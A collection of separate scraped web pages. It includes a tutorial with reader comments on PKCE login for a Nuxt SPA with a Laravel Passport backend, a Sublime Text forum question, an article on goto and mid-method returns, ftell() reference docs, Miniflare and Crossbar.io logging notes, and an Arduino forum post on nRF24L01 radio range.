Then we are going to need the crypto package for hashing:

```shell
npm install crypto-js
```

Now replace all the code in pages/index.vue with this:

```vue
<template>
    <div class="container">
        <button @click="openLoginWindow">Login</button>
    </div>
</template>

<script>
import crypto from 'crypto-js';

export default {
    data() {
        return {
            email: '',
            password: '',
            state: '',
            challenge: '',
        }
    },
    computed: {
        loginUrl() {
            return '*&state=' + this.state + '&code_challenge=' + this.challenge + '&code_challenge_method=S256'
        }
    },
    mounted() {
        window.addEventListener('message', (e) => {
            if (e.origin !== '' || ! Object.keys(e.data).includes('access_token')) {
                return;
            }

            const {token_type, expires_in, access_token, refresh_token} = e.data;
            this.$axios.setToken(access_token, token_type);
            this.$axios.$get('')
                .then(resp => {
                    console.log(resp);
                })
        });

        this.state = this.createRandomString(40);
        const verifier = this.createRandomString(128);
        this.challenge = this.base64Url(crypto.SHA256(verifier));

        window.localStorage.setItem('state', this.state);
        window.localStorage.setItem('verifier', verifier);
    },
    methods: {
        openLoginWindow() {
            window.open(this.loginUrl, 'popup', 'width=700,height=700');
        },
        createRandomString(num) {
            return [...Array(num)].map(() => Math.random().toString(36)[2]).join('')
        },
        base64Url(string) {
            return string.toString(crypto.enc.Base64)
                .replace(/\+/g, '-')
                .replace(/\//g, '_')
                .replace(/=/g, '');
        }
    }
}
</script>
```

Let me explain what's going on in here:

- Creating the template: nothing fancy going on here; we are creating a button and attaching an onClick handler that will trigger some function.
- In the mounted hook, we are binding an event listener to the window that we are going to use later; we are setting `state` to be a random 40-character string, we are creating a `verifier` that will be a random 128-character string, and then we are setting the challenge. The `challenge` is the SHA256-hashed `verifier` string converted to a base64 string. And we are saving the `state` and the `verifier` in localStorage.
- Then we have some methods that we've defined.

Now the flow looks like this:

1. The user clicks on the login button.
2. On click, it triggers the openLoginWindow function, which opens a new popup window for the provided URL. this.loginUrl is a computed property that holds the URL on which we want to authorize our app. It consists of the base URL (), the route for the authorization (oauth/authorize - this is the route that Passport provides for us) and the query parameters that we need to pass (you can look them up in the Passport documentation): client_id, redirect_uri, response_type, scope, state, code_challenge and code_challenge_method.
3. The popup opens, and since we are not logged in and the oauth/authorize route is protected by the auth middleware, we are redirected to the login page, but our intended URL is saved in the session.
4. After we submit our credentials and are successfully logged in, we are redirected to our intended URL (which is oauth/authorize with all the query parameters).
5. And if the query parameters are good, we are redirected to the redirect_url that we specified (in my case), with state and code in the response.
6. On the auth page, which we are going to create, we need to check if the state returned from Laravel is the same as the state that we saved in localStorage. If it is, we are going to make a POST request with query parameters: grant_type, client_id, redirect_uri, code_verifier (this is the verifier that we stored in localStorage) and code (that was returned by Laravel).
7. If everything is OK, we're going to emit an event (we're listening for that event on our index page) with the response provided by Laravel; in that response is our token.
8. The event listener function is called, and we are setting the token on our axios instance.

Let's make our auth page so that everything becomes more clear.
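The state/verifier/challenge derivation described above can be cross-checked outside the browser. Here is the same S256 computation sketched in Python (the post itself uses crypto-js; the random-generation details differ, but the hashing and base64url steps match RFC 7636):

```python
import base64
import hashlib
import secrets

def make_pkce_pair():
    """Generate a code_verifier and its S256 code_challenge."""
    # A URL-safe random verifier (43-128 characters per RFC 7636).
    verifier = base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    # base64url without padding, mirroring the base64Url() helper in index.vue.
    challenge = base64.urlsafe_b64encode(digest).rstrip(b"=").decode()
    return verifier, challenge

# RFC 7636's appendix gives a known verifier/challenge pair we can reproduce:
rfc_verifier = "dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk"
digest = hashlib.sha256(rfc_verifier.encode("ascii")).digest()
print(base64.urlsafe_b64encode(digest).rstrip(b"=").decode())
# E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM
```

The backend never sees the verifier until the token exchange in step 10, which is what makes an intercepted authorization code useless on its own.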
In pages, create a new page auth.vue and put this inside:

```vue
<template>
    <h1>Logging in...</h1>
</template>

<script>
export default {
    mounted() {
        const urlParams = new URLSearchParams(window.location.search);
        const code = urlParams.get('code');
        const state = urlParams.get('state');

        if (code && state) {
            if (state === window.localStorage.getItem('state')) {
                let params = {
                    grant_type: 'authorization_code',
                    client_id: 1,
                    redirect_uri: '',
                    code_verifier: window.localStorage.getItem('verifier'),
                    code
                }

                this.$axios.$post('', params)
                    .then(resp => {
                        window.opener.postMessage(resp);
                        localStorage.removeItem('state');
                        localStorage.removeItem('verifier');
                        window.close();
                    })
                    .catch(e => {
                        console.dir(e);
                    });
            }
        }
    },
}
</script>
```

Everything in here is explained in steps 6 and 7 above. But once again: we are getting the state and code from the URL, we are checking if the state from the URL and the state we stored in localStorage are the same, and if they are, we make a POST request to oauth/token with the required parameters; on success, we emit an event and pass the Laravel response, which contains the token.

That's it, that's all you have to do. Of course, this is a basic example; your access_token should be short-lived and stored in cookies, and your refresh_token should be long-lived and set in an httponly cookie in order to secure your application. This was a relatively short post to cover all of that, but if you want to know more, you can look at my other post, Secure authentication in Nuxt SPA with Laravel as back-end, where I cover these things.

If you have any questions or suggestions, please comment below.

Discussion

Hi,

SOLVED: Everything worked fine, but now I get the following. When logging in, when returning to the Nuxt auth.vue, I get:

x-access-token undefined localhost / Session 23

Is it a backend problem?

Problem was the client id in the frontend that was wrong in two files: login and auth.

Hi, when I want to retrieve data (articles) when I'm logged in, I get this error:

Access to XMLHttpRequest at 'domain.com/api/trials/' from origin 'app.domain.com/' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: Redirect is not allowed for a preflight request.

```javascript
// nuxt -> index.vue (works locally but not on the domains)
async asyncData({ $axios }) {
    const trials = await $axios.$get(process.env.LARAVEL_ENDPOINT + "/api/trials/");
    return { trials };
},
```

```php
// laravel api route /api/trials
Route::group(['middleware' => 'cors'], function() {
    Route::group(['middleware' => ['auth:api']], function () {
        Route::resource('trials', 'API\TrialController')
            ->only(['index', 'store', 'show', 'edit', 'update', 'destroy']);
    });
});
```

```php
// TrialController
class TrialController extends Controller
{
    public function __construct()
    {
        $this->middleware('auth:api');
    }

    public function index()
    {
        $trials = Auth::user()->parentTrials()->get();
        // ...
    }
}
```

If you are using Laravel version 6.x, then you should add a CORS middleware; if you are using Laravel 7.x, you should just set up the CORS config that's already there.

I use this in the backend: "fruitcake/laravel-cors": "^2.0". I can retrieve data with Postman if I use the header:

Authorization: Bearer eyJ0eXAiOiJKV1Q.....

Do I need to set some headers on the Nuxt request?

```javascript
async asyncData({ $axios }) {
    const trials = await $axios.$get(process.env.LARAVEL_ENDPOINT + "/api/trials/");
    return { trials };
},
```

If yes, how? I see many others have the same problem.

You need to send the Bearer header with every request.

Do you have an example?
I'm trying with this but I can't get the token:

```javascript
async asyncData (context) {
    const trials = await $axios.$get(process.env.LARAVEL_ENDPOINT + "/api/trials/", {}, {
        headers: { "Authorization": `Bearer ${context.app.$auth.getToken('local')}` }
    })
}
```

I can see the cookie x-access-token in the Chrome developer tools under Application.

Now I got the access_token:

```javascript
const access_token = cookies.get('x-access-token');
console.log(access_token);
```

But still no content, only errors:

Access to XMLHttpRequest at 'domain.com/api/trials/' from origin 'app.domain.com' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: Redirect is not allowed for a preflight request.
cf5ce039ccd82a3e879b.js:1 GET domain.com/api/trials/ net::ERR_FAILED
Request URL: domain.com/api/trials/
Referrer Policy: no-referrer-when-downgrade
Provisional headers are shown

You should do something like this:

```javascript
this.$axios.setToken(access_token, token_type);
```

Hi again. Now I need to update a post and the error comes again, but only on the domain, not locally:

Console error:

Access to XMLHttpRequest at 'domain.com/api/trials/' from origin 'app.domain.com' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: Redirect is not allowed for a preflight request.
600bbbde120028ba59aa.js:1 POST domain.com/api/trials/ net::ERR_FAILED

Laravel log error:

[2020-06-22 16:05:59] local.ERROR: The resource owner or authorization server denied the request. {"exception":"object [stacktrace].....\TokenGuard.php(149): Laravel\Passport\Guards\TokenGuard->getPsrRequestViaBearerToken

My update submit:

```javascript
UpdateForm(key) {
    event.preventDefault();
    var app = this;
    // ...
}
```

You need to set up the correct domain for the CORS config.

But it works for GET (posts) and getting users, just not for updating content (POST).

See if the POST request has been enabled for CORS.

How can I see that?
I'm new to CORS; it's hard to debug when it works locally but not on the server.

Read the documentation for fruitcake/laravel-cors.

When I read the docs I can't find what to change to get POST to work. Do you know where to see an example where an update with POST has been used, with Nuxt/Passport? Almost all examples are just GET.

Now it works. :) My post looks like: I also removed a / from /api/trials (it was /api/trials/). I will try later to remove some of the code to see if it all has to be there.

Firstly, thank you for your great work! I've been searching for a long time for how to authenticate Vue SPAs with Laravel and found Laravel Passport, but it seems that Laravel Passport wasn't made for this purpose! And PKCE is breaking the UX; this prompt is a bit confusing for users. I'm looking for something simple for SPAs. I found an alternative, which is Sanctum. I read the intro about it in the docs and found that Sanctum was mainly built for SPAs. My question is about best practices and security: do you recommend using Sanctum instead?

If both your applications are on the same top-level domain, yes, it's best to use Sanctum. If they are not on the same top-level domain, you can't use Sanctum.

Thank you for the fast response <3

Thanks for the informative post. I wanted to know: if the front end and back end are on two domains, can't we use Sanctum's API token authentication? laravel.com/docs/7.x/sanctum#api-t...

You can, but I haven't used it yet. I think it's not as flexible as Passport.

Why not use the @nuxtjs/auth-next module? If it's not flexible enough, you can make your own scheme like this: schemes/laravelPassport.js: And then use it like this in nuxt.config.js:

What you did here is almost the same as if you had done it custom, without using the nuxtjs/auth-next module. So why should we introduce another package into our project if the code is similar?

Hi! Very helpful tutorial!
The only inconvenience I have is that the session starts at login, and when I tried to revoke the token (the route is under the auth:api middleware) the session is not over, and when I try to log in again, it skips the login form and jumps to the authorization prompt or straight to the callback page. I tried to create a route in the web middleware which kills the session, but it always stores the 'laravel_session' and 'XSRF-TOKEN' cookies and I can't delete them. Did this happen to you? Thanks in advance.

How do you revoke the token?

Yes, not only using that but also as the docs indicate: Laravel - revoking tokens. This is not working for me because it uses the laravel_session cookie data to persist the login and returns a new access_token without asking for credentials again, redirecting to the callback page directly. Laravel destroys the session after a while or when the browser is closed, but it's a problem when I want to change which user I log in as, because I have to wait or close everything. Maybe the problem is the session-based login, but there is not much info about it. I would like to know if it has happened to you and if anyone could solve it. Sorry about my English; it is not my mother tongue. And thanks again!

Maybe you should try to revoke the token and clear the user's session; maybe that will do it. But I don't know if this is the right way to log out a user...

After several trials, I came up with a solution (not an elegant one, I guess) that works. It's a mix of logging out from the API guard (api.php routes with the auth:api middleware), revoking the token: And in the web guard (web.php routes), killing the session: In the frontend I send an axios POST request to the logoutAPI route and then call the logoutSession route. Here is the code using the @nuxtjs/auth-next module. This way, every time I log out from the app and log in again, the credentials are required and nothing persists. Thanks for your replies, I hope this helps someone!
Hi again; now I'm at: logout. I can log out on the frontend, but the backend (Laravel) is still logged in, so if I click login on the frontend the user gets logged in again. How do I log out on the Laravel backend so the user has to enter their email and password again to log in? This doesn't work; the user is not logged out in the backend:

Api route:
Route::middleware(['auth:api'])->group(function () {
  Route::post('/logout', 'Auth\AuthWepAppController@logoutApi');
});

AuthWepAppController:
public function logoutApi (Request $request) {

Hi again Stefan. With the code you have written, the user is logged out when refreshing the page. How do I handle it so the user doesn't get logged out on page refresh? The attached screendump is what I have after a page refresh: dev-to-uploads.s3.amazonaws.com/i/...

On page reload, check for the token in cookies, and if there is a token in the cookies, just set it in axios.

I did, in authIt.js:

const access_token = cookies.get('x-access-token');
if no token redirect to /login
else
store.$axios.$get(process.env.LARAVEL_ENDPOINT+'/api/user')
  .then(resp => {
    store.$auth.setUser(resp)
......

Thank you for the excellent tutorial. This is the best tutorial I have found on using Passport's PKCE functionality, and I would not have been able to figure it out myself. I was able to port your solution today into a React front end with a Laravel back end. I just have a few questions about using this technique, if you have time.

1) If the OAuth2 server knows when the access token expires and therefore won't allow access with an expired token, it seems that it's fine to store the access token outside a cookie, since our main protection is the quick timeout? (I'm planning on using Redux, which is basically session.)

2) Does a registration page now necessarily need to send a user through the PKCE flow after registration, rather than issuing a token using the password grant on initial registration?

3) Does PKCE matter for the refresh token exchange?
That is, after we have gone to all this trouble to get the access token through PKCE, do we shoot ourselves in the foot if we don't use the same precaution on a subsequent refresh token?

I'm always storing my short-lived access_token in a cookie, and my long-lived refresh_token in an httponly cookie; also, Laravel has CSRF protection out of the box. That way I'm protected from potential XSS and CSRF attacks.

I think you must use the PKCE flow, because the client_ids are not the same. But I've never tested this; maybe you could try it out and comment here if you can make it work.

No, we have a separate route in which we refresh the token. My refresh_token's expiry time is 10 days, but a new refresh_token is issued every time a new access_token is requested. So the user will have to go through the whole PKCE flow if they weren't active for 10 days straight.

So I have been reading RFCs today... because quarantine... and I am actually attempting to understand what "the standard" is. I think the best documents are currently OAuth 2.0 for Browser-Based Apps and Proof Key for Code Exchange by OAuth Public Clients. In the best practices document (first link) there is a great discussion (section 6) about choosing an OAuth2 solution based on the architecture you're working with, which makes a lot of sense. Unlocking this critical aspect essentially answered some of my questions, the most important being to realize that if your architecture and requirements don't "need" redirects, then there is probably a more secure way to accomplish the task without PKCE; essentially, PKCE would be the less secure option if one can get it done without needing redirects. Maybe that was super obvious, but I was just assuming that PKCE is the new standard that everyone needs to switch to, which was causing me to try to jam all the concepts together.

1) Regarding storing tokens.
I think you were very close (if not 100%) to what is suggested in the best practices with your previous post, Secure authentication in Nuxt SPA with Laravel as back-end.

2) Regarding user registration. Based on the above logic, an application that also worries about initial user registration is probably in a position architecturally to not need PKCE, so it is out of bounds.

3) Regarding refresh tokens and PKCE. If one is truly working with a public client (where you really need PKCE), it is the case that issuing refresh tokens is indeed more risky than the access token. In my opinion the separate time expiry you suggested would not increase security, but there are some interesting suggestions for refresh tokens with PKCE in the best practices, including not using them, or using a decreasing-expiration refresh token that still needs to be reacquired every 24 hours.

Yes, the part about decreasing the refresh_token expiration time is very interesting, and I might try that.

Sorry to disturb you again. I'm still having problems with how to get the user's info (like their name) to show on a page (like in the footer). If I reload the web app I still have the access token, but the name I set with this.$auth.setUser(resp.name) is gone. Do you have an example of how to get the web app to keep the user name after a reload? I can do it with a cookie, but I think that's not safe.

You can use cookies to persist the state, or use some package that does that. Don't worry about security, because the user name is not sensitive information.

Can't other users just change the userId in the local cookie to something else and then get another user's info from the API? In my case, todos.

Well, if you've set up your back-end properly, they won't be able to do that.

With your method here, I'm logged in to the Laravel backend. Is that an expected result? Is there a way to prevent logging in to the backend? I have the same issue with @nuxtjs/auth (and the @nuxtjs/auth-next module).
Maybe it's something I'm misunderstanding about using Laravel Passport. Also, why not use a Passport grant token?

We are using a Passport grant token. You must be logged in to the backend if you want to make a request to the backend.

Hi, one more question. I'm new to Passport, so what about all the auth tokens in the DB? I can see many of them. Are they deleted automatically by Laravel Passport?

SELECT * FROM oauth_access_tokens
5fea03842964060c10590e072ce5571478c4270705caf5c447... 22 1 authToken [] 0 2020-05-14 11:41:19 2020-05-14 11:41:19 2021-05-14 11:41:19
874657bfbafafa674aeac5f5c01b967fa7b95dff71ef4c2c1e... 22 1
.................

No, they are not deleted automatically.

Hi again. Question about logout: I can do this in the frontend:

this.$auth.logout();

But how do I log out of the Laravel backend? I have tried:

Nuxt:
this.$axios.$post(process.env.LARAVEL_ENDPOINT+'/api/logout')
  .then(response => {.....

Laravel backend:
API.php
*******************
Route::middleware('auth:api')->group(function () {
  Route::post('logout', 'Auth\AuthWepAppController@logoutApi')->name('logout');
});

AuthWepAppController
*******************

It gives me this error:

message": "Call to undefined method Illuminate\Support\Facades\Request::user()",

What am I missing? Thanks.

Hi again Stefan. I'm trying again to figure out how to log out from the backend. How do you log out on the backend? This doesn't work; the user is not logged out in the backend:

Api route:
Route::middleware(['auth:api'])->group(function () {
  Route::post('/logout', 'Auth\AuthWepAppController@logoutApi');
});

AuthWepAppController:
public function logoutApi (Request $request) {
  $request->session()->flush();
}

Just get the user's token and delete it: Auth::user()->token()->delete()

Great tutorial. I'm new to Passport and PKCE. What is the "best practice" way of checking in the frontend whether a user is logged in, so that a logout button is shown instead of a login button?
You should check if the token exists in the cookies or in localStorage (wherever you have stored it).

I have not stored it yet. Is the way you store it here the best way? dev.to/stefant123/secure-authentic...

I think yes; I still haven't found any better way to do it.

Question: we actually DON'T want the user to be stored in the session, because we want the login prompt to be shown each time the user hits oauth/authorize in the client... is this an option?

TBH I don't really know, but I guess you could do something like this: for example, when the user hits oauth/authorize you can run some middleware that deletes the session for that user, and the login prompt would be shown. Maybe this is the way you could do it, but then again I'm not sure whether this would work, or why you would want this.
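To round off the logout sub-thread above, here is a hedged sketch of a controller method that revokes the current Passport token. The controller and route names mirror the thread, the response body is my own choice, and none of this has been tested against the posters' apps:

```php
<?php

// Sketch only: revoke the current Passport access token on the API guard.
// Route: Route::middleware('auth:api')->post('/logout', ...);

use Illuminate\Http\Request;

class AuthWepAppController extends Controller
{
    public function logoutApi(Request $request)
    {
        // $request->user() works here, unlike the Request facade, which
        // produced the "Call to undefined method" error quoted above.
        $request->user()->token()->revoke();

        return response()->json(['message' => 'Logged out']);
    }
}
```

Note that the browser-session cookie on the authorization server is separate from the API token, which is why revoking the token alone still skips the login form; the session also has to be cleared, as in the api/web two-step solution described earlier in the thread.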
https://practicaldev-herokuapp-com.global.ssl.fastly.net/stefant123/pkce-authenticaton-for-nuxt-spa-with-laravel-as-backend-170n
Hi, all, I am a new user of ST2. Thanks for reading my questions (I'm using ST2 on OS X Mountain Lion):

Is there any way to view all currently available tab triggers, as I can in TextMate's Bundles toolbar menu? Or is there any plan to add such a menu?

I can see many TextMate bundle files in the ~/Library/Application Support/Sublime Text 2/Packages/ directory, such as html/HTML.tmLanguage, or some files ending with .tmPreferences... but how can I make use of these files?

In TextMate, when I edit HTML files, I can use super + b to wrap text with <strong> tags and super + i to wrap with <em> tags. How can I do the same (other key bindings are OK) in ST2?

When I edit a Rails view template file (.html.erb), with the syntax scope set to HTML (Rails), "if + tab" gives me PHP code: <?php if (condition): ?><?php endif ?>. Why?

thanks!
Hi xiaolai, I'm having the same issues. Although I love TM, I wanted to move to something that was under active development and that I had confidence in, so I purchased ST2 after trying it for a week. Unfortunately I was working on a PHP project at the time and didn't realise the lack of support ST2 has for Rails development out of the box (my bad). The "if + tab" inserting a PHP block is a bug due to the scope of the PHP snippet, which is covered in another post in this forum. I've spent several hours googling for help on ST2 + Rails and have come to the conclusion that you have to either roll your own or install a package from the community. Personally I dislike both of these options: as a freelance developer I tend to see my editor as a tool and don't want to spend time messing with it, and I'd prefer the company that developed the editor to create the required plugins, as I have more faith in the quality of their code, etc.

I'm sure I'll get hammered for my opinions, as there are a lot of people who love ST2. I'm one of those people who are happy to pay for good software, and ST2 is definitely worth the money it cost me, but I'm contemplating moving to RubyMine for Rails development; it may be worth you having a look too.

For your third point, have a look at github.com/ignacysokolowski/SublimeTagWrapper .
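For the tag-wrapping question, a plugin-free alternative is a user key binding that wraps the current selection via Sublime's built-in insert_snippet command. The tag choices below are assumptions mirroring TextMate's bold/italic behavior, and note that super+b is bound to Build by default, so you may prefer different chords:

```json
// Preferences > Key Bindings - User
[
    { "keys": ["super+b"], "command": "insert_snippet",
      "args": { "contents": "<strong>${0:$SELECTION}</strong>" } },
    { "keys": ["super+i"], "command": "insert_snippet",
      "args": { "contents": "<em>${0:$SELECTION}</em>" } }
]
```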
https://forum.sublimetext.com/t/newbie-questions/7482/1
In his 15+ years of developing software, Eric Bruno has acted as technical advisor, chief architect, and led teams of developers. He can be contacted at.

I've been part of software teams and projects where the leaders start by putting together a "programming standards" document. The first entry always seems to be "don't use goto" if the language in question supports it. I'll start by saying this: aside from BASIC programs I wrote in high school, I've never used the goto keyword in any of my code. In fact, with Java, there is no goto statement. Or is there?

Most programmers will agree that properly written, well-structured code doesn't require the use of goto, and I agree with this. The problem is, if you simply state "no goto" you might as well say "no JMP command in the generated assembly code" as well. When we write and compile code, the result is assembly/machine code that the processor can execute. Even higher-level languages like Java get compiled to machine code when executed, thanks to technology such as the HotSpot Java VM. If you've ever written assembly code, or viewed the output of a compiler, you'll notice the JMP command all over the place, usually coupled with a test for some condition. This is one way that branching and code flow control is performed in the CPU. Basically, it's the same as a goto statement, and if you subscribe to the "no goto" rule, why not eliminate it also? The answer is, if you did, you probably couldn't get any of your software to run. I use this as proof that the "no goto" rule is flawed; we need to state something more precise.

It's More than Goto

I've seen a lot of code that violates the "no goto" rule without even using goto. For instance, if goto violates the principles of structured code, does calling return in the middle of a method violate it also? I tend to say yes, and I try to structure my code to avoid this.
Look at the following as an example:

private boolean processTransaction(Transaction trans) {
    // do some session security checking
    User user = trans.user;
    log("security check for user " + user.name);
    if ( user.loggedIn() == false )
        return false;
    if ( user.sessionTimeout() == true )
        return false;

    boolean success = true;
    // process transaction here
    return success;
}

This method checks two things before attempting to process a transaction: first, it checks that the user is logged in; and second, it checks that the user's session hasn't timed out. If either check fails, it aborts the transaction by returning false, but it does so in two places in the middle of the method. I refer to this as a mid-method return (MMR) and there's something I don't like about it. For instance, it's not always obvious where the checks begin and end, and where the actual processing occurs. In this case, the code above the checks stores the user object and logs the user's name. The code after the checks does the actual work of processing the transaction, but what if another programmer needs to modify this code? He could accidentally insert some code between the if statements, inadvertently doing some work that shouldn't be done until after all the checks are complete. In this simple example, it would be obvious to most programmers that this is wrong; but in a lot of code I've seen, it's easy to make this mistake. To resolve this, I propose that the following code is better:

private boolean processTransaction(Transaction transaction) {
    // do some session security checking
    User user = transaction.user;
    log("security check for user " + user.name);

    boolean success = false;
    if ( user.loggedIn() ) {
        if ( ! user.sessionTimeout() ) {
            // process transaction here
            success = true;
        }
    }
    return success;
}

It's now more obvious where the checks are complete and the real processing begins; the code actually draws your eyes to the right spot.
Also, with only one line in the method that returns a value, you have less "mental accounting" to do as you read from top to bottom. As a pleasant side effect, it's easy to discover where the success variable is declared. (How many times have you hunted through a long method to find declarations?) Some people don't like nesting all of the if statements, but I find that this can usually be limited or avoided outright by combining related checks. The following code is an example:

if ( user.loggedIn() && ! user.sessionTimeout() ) {
    // process transaction here
}

Since the user's login and session timeout status are related checks, I have no problem checking them both in the same if statement. If there were a requirement to also check the date (i.e., check that it's not Sunday), then I'd prefer to see that in a separate if statement — but that's a matter of taste. The point is that mid-method returns can be just as bad as using a goto statement in your code; they disrupt code structure, flow, and readability. However, that's not where it ends.
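The refactoring above can be made concrete with a small runnable sketch. The User stub here is an assumption (the article never shows the class), and the success = true line stands in for the real transaction work:

```java
// Runnable sketch of the article's final style: related checks combined
// into one if statement, with a single return at the end.
class User {
    private final boolean loggedIn;
    private final boolean timedOut;

    User(boolean loggedIn, boolean timedOut) {
        this.loggedIn = loggedIn;
        this.timedOut = timedOut;
    }

    boolean loggedIn() { return loggedIn; }
    boolean sessionTimeout() { return timedOut; }
}

class TransactionDemo {
    static boolean processTransaction(User user) {
        boolean success = false;
        if (user.loggedIn() && !user.sessionTimeout()) {
            // process transaction here
            success = true;
        }
        return success;
    }

    public static void main(String[] args) {
        System.out.println(processTransaction(new User(true, false)));
        System.out.println(processTransaction(new User(true, true)));
    }
}
```

Reading top to bottom, there is exactly one return and one place where success is assigned true, which is the property the article is arguing for.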
http://www.drdobbs.com/jvm/programming-with-reason-why-is-goto-bad/228200966
ftell(), ftello(), ftello64()

Return the current position of a stream

Synopsis:

#include <stdio.h>

long int ftell( FILE* fp );
off_t ftello( FILE* fp );
off64_t ftello64( FILE* fp );

Since: BlackBerry 10.0.0

Arguments:

- fp - The stream that you want to get the current position of.

Library:

libc

Use the -l c option to qcc to link against this library. This library is usually included automatically.

Description:

The ftell(), ftello(), and ftello64() functions return the current position of the stream specified by fp. This position defines the character that will be read or written by the next I/O operation on the file. The difference between these functions is the data type of the returned position. You can use the value returned by an ftell() function in a subsequent call to fseek(), fseeko(), or fseeko64() to restore the file position to a previous value.

Examples:

This example opens a file and prints the current position:

#include <stdio.h>
#include <stdlib.h>

int main( void )
{
    FILE *fp = fopen( "file", "r" );

    if( fp != NULL ) {
        /* Report the position of the next character to be read. */
        printf( "Current position: %ld\n", ftell( fp ) );
        fclose( fp );
        return EXIT_SUCCESS;
    }
    return EXIT_FAILURE;
}

Classification:

ftell() is ANSI, POSIX 1003.1; ftello() is POSIX 1003.1; ftello64() is Large-file support

Last modified: 2014-06-24
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/f/ftell.html
Miniflare is a simulator for developing and testing Cloudflare Workers. Originally started as an open-source project, Miniflare has been adopted by Cloudflare to become part of their ecosystem.

Installation via npm:

npm install -g miniflare

CLI usage is really simple, and is highly configurable using one of its many flags:

$ miniflare worker.js
[mf:inf] Worker reloaded! (97B)
[mf:inf] Listening on :8787
[mf:inf] -

Alternatively you can also use it in your own JS code:

import { Miniflare } from "miniflare";

const mf = new Miniflare({
  script: `
    addEventListener("fetch", (event) => {
      event.respondWith(new Response("Hello Miniflare!"));
    });
  `,
});

const res = await mf.dispatchFetch("");
console.log(await res.text()); // Hello Miniflare!

🤔 Want to get started with Cloudflare Workers? This guide by Chris Ferdinandi should get you on track.
https://www.bram.us/2021/09/27/miniflare-fully-local-simulator-for-cloudflare-workers/
Logging in Crossbar.io

Crossbar.io's structured logging system is present in versions 0.11 and above. Crossbar.io uses Twisted's new Logger facilities to provide structured logging for Crossbar.io and components run inside of it.

Twisted Logger

Twisted Logger, introduced in Twisted 15.2, provides structured logging for Python applications. Crossbar.io integrates with this and uses it internally, and your components can take advantage of it. Crossbar.io also captures stdout, so print() statements will also be captured.

Writing Components that use Logger

A component that uses Logger is the hello example application. To set your application up for logging, import Logger from twisted.logger and instantiate it. If you have classes, making it a class attribute allows Logger to store some more information (more on that later). The Logger instance has several methods, relating to the levels of events:

critical: For unhandled/unhandleable errors.
error: For handled errors.
warn: For warnings which may affect the component but are not errors (for example: deprecated configuration, or having to make assumptions).
info: For general information messages.
debug: For debugging information.

These methods take at least one argument (the "format string") which will be used to produce a textual representation of the log event. This argument follows the standard Python format string representation as in PEP-3101. Further keyword arguments can be given which will be used in the formatting. The formatting may not be done straight away: if the log event is never observed (for example, if it is a debug message, and the log observer level is set to info) the event will never be formatted into a string. This can be more efficient, as it means debug calls essentially turn into no-ops when the log level of the listener is not on debug as well.

As an example, if we have a variable named counter which is set to 1, and a Logger instance at self.log, we could do the following:

self.log.info("published to 'oncounter' with counter {counter}", counter=counter)
As an example, if we have a variable named counter which is set to 1, and a Logger instance at self.log, we could do the following: self.log.info("published to 'oncounter' with counter {counter}", counter=counter) This message would show up in the Crossbar logs as: 2015-08-17T13:45:10+0800 [Container 7326] published to 'oncounter' with counter 1 Log recovery at all costs¶ If your log message cannot be formatted, Logger will try and preserve as much as possible. For example, if you forgot to pass the counter keyword argument to the self.log.info call… self.log.info("published to 'oncounter' with counter {counter}") …it would produce the following in Crossbar’s log: 2015-08-17T14:22:47+0800 [Container 7676] Unable to format event {'log_logger': <Logger 'hello.hello.AppSession'>, 'log_time': 1439792567.720701, 'log_source': <hello.hello.AppSession object at 0x10af0e290>, 'log_format': "published to 'oncounter' with counter {counter}"}: u'counter' Logger will try and preserve as much information as possible, no matter what errors may occur, rather than eating the message. Class instance Loggers¶ If you make your Logger a class attribute (as in the hello example), it captures some extra information. The log_source attribute in the log event is set automatically when it is a class attribute, which points to the instance of the class that it was called from. This means that you can get information from the class instance without having to individually pass it into the log call. For example: from twisted.logger import Logger from autobahn.twisted.wamp import ApplicationSession class AppSession(ApplicationSession): log = Logger() def onJoin(self, details): self.x = "Hello Crossbar!" self.log.info("x on self is {log_source.x}") When this application component is run under Crossbar, it will produce the following log message: 2015-08-17T14:28:13+0800 [Container 7825] x on self is Hello Crossbar! 
Plus, when Crossbar’s logger is set to debug, each log message comes with where it came from in the log, to help trace down where errors may be occurring: 2015-08-17T13:43:52+0800 [Container 7310 hello.hello.AppSession] published to 'oncounter' with counter 2 Configuring the Crossbar logger¶ For more information on configuring the Crossbar.io logging output (for example, to turn on debug, change the output format, or write to a file), see Configuring Crossbar.io’s Logging .
https://crossbar.io/docs/Logging-in-Crossbar.io/
Hello, I am using an NRF24L01+PA to send a signal to a drone which has a standard NRF24L01 on it. I am trying to get the best range possible. I would like to go out 1000 m+, always with a clear line of sight. I have been doing a few tests using the simple code below that controls an LED on the drone. I can only get the MIN and LOW power levels to successfully send a signal to the receiver. In LOW power mode I can get to about 300 m successfully. I would like to figure out how I can get the MAX power level to successfully send a signal. I am using the breakout board shown below to power the transmitter and have also added a capacitor to the transmitter. I have tried to shield the transmitter as well, and have tried multiple channels. What is weird is that while in MAX power output I can sometimes get a signal to the receiver if I hold the antenna of the transmitter in my hand. I figured that the transmitter might be overpowering the receiver with its signal. However, I took my drone out to 300 m and I still won't receive a signal in MAX. Any suggestions on how I can get a consistent transmission with full power from the transmitter?
TRANSMITTER

#include <SPI.h>
#include <nRF24L01.h>
#include <RF24.h>

RF24 radio(7, 8); // CE, CSN
const byte address[6] = "00001";
const int button = 4;
int buttonState = 0;

void setup() {
  Serial.begin(115200);
  pinMode(button, INPUT);
  radio.begin();
  radio.setDataRate(RF24_250KBPS);
  radio.setChannel(35);
  radio.setPALevel(RF24_PA_LOW);
  radio.openWritingPipe(address);
}

void loop() {
  buttonState = digitalRead(button);
  if (buttonState == HIGH) {
    radio.openWritingPipe(address);
    radio.write(&buttonState, sizeof(buttonState));
  }
  Serial.println(buttonState);
}

RECEIVER

#include <SPI.h>
#include <nRF24L01.h>
#include <RF24.h>

RF24 radio(7, 8); // CE, CSN
const byte address[6] = "00001";
int buttonState = 0;
int ledpin = 10;

void setup() {
  Serial.begin(115200);
  pinMode(ledpin, OUTPUT);
  radio.begin();
  radio.setDataRate(RF24_250KBPS);
  radio.setChannel(35);
  radio.openReadingPipe(1, address);
  radio.startListening();
}

void loop() {
  if (radio.available()) {
